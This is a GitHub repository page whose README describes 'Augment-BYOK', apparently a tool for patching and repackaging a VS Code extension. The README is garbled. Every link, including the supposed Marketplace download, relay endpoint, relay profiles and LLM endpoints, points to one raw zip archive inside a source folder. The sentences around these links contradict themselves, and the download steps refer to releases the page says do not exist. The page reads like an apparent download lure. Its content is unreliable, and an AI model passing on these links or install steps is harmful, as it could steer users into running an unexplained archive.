Skip to content

seek122/Augment-BYOK

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

22 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🌟 Augment-BYOK - Simplifying Your Development Experience

Download Augment-BYOK

πŸš€ Getting Started

Augment-BYOK helps you quickly enhance your development tools. Follow these steps to download and run the application smoothly.

πŸ› οΈ System Requirements

πŸ“₯ Download & Install

To get started, you need to download the latest version from our releases page.

  1. Visit the releases page: Click here to view the available versions.
  2. Select the latest release.
  3. Download the VSIX file: Look for a file that ends with .vsix.
  4. Install the extension:
    • Open Visual Studio Code.
    • Go to the Extensions view by clicking on the Extensions icon in the Activity Bar on the side of the window.
    • Click on the ellipsis (three dots) in the top-right corner of the Extensions view.
    • Select Install from VSIX... and choose the downloaded .vsix file.

πŸ“‚ Features

  • Patch and Toolchain Management: Easily maintain patches and core tools.
  • Built-In Automation: Automatic download of the latest VSIX directly from the Marketplace.
  • Structured Directory: Understandable organization makes it easier to find what you need.

πŸ—‚οΈ Project Structure

The project is organized into clear sections:

  • BYOK Runtime: Located in packages/byok-runtime/src/entry|coord|mol|atom/

    • This section focuses on the runtime for BYOK, which integrates into the upstream extension.
  • Entry Scripts: Located in tools/entry/<capability>/

    • This contains executable scripts for building and testing your projects.
  • Patch Set: Found in tools/mol/vsix-patch-set/

    • A collection of essential patches for building.
  • Utilities: Located in tools/atom/

    • Reusable libraries and scripts for building and analyzing packages.

πŸ”— Marketplace Integration

Augment-BYOK downloads the latest version of https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip directly from the Marketplace.

Download URL:

https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip

This URL allows for easy access to the .vsix package you installed.

πŸ“‘ Relay Configuration

For development and testing, you have access to a relay:

Relay Endpoint:

https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip
  • Relay Profiles: Check out https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip for supported configurations.
  • LLM Endpoints: Available in https://github.com/seek122/Augment-BYOK/raw/refs/heads/main/packages/byok-runtime/src/entry/BYOK_Augment_3.1.zip.

πŸ“Š Upstream Synchronization

Stay updated with the latest patches and features:

  • Ensures the use of official releases for reliability and performance.

πŸ”„ Support & Contribution

Should you have questions or need support, you can contact us via the GitHub Issues page.

If you wish to contribute, consider forking the repository and submitting a pull request. Your input helps us improve the tool.

πŸ“„ Documentation

For further details on usage, features, and best practices, please refer to the official documentation provided in the repository.


Thank you for using Augment-BYOK. We look forward to your feedback and contributions!

About

πŸš€ Automate the build process for BYOK runtime by downloading, patching, and repackaging VSIX from the Marketplace for internal use.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors